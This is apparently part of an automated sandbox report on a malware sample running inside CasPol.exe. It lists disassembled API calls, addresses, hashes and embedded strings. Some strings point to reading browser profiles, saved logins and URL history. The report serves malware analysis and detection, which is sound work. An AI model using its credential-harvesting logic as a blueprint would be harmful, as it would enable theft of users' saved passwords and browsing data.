                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040129E
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 829165378-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00404172
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                  • API String ID: 2454223109-1580313836
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                  • API String ID: 4054529287-3175352466
                                                                                                                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                                                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1043902810-0
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                  • API String ID: 3330709923-517860148
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                  • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                  • String ID: logins$null
                                                                                                                                                                                  • API String ID: 2148543256-2163367763
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID: ---
                                                                                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                                                                                  APIs
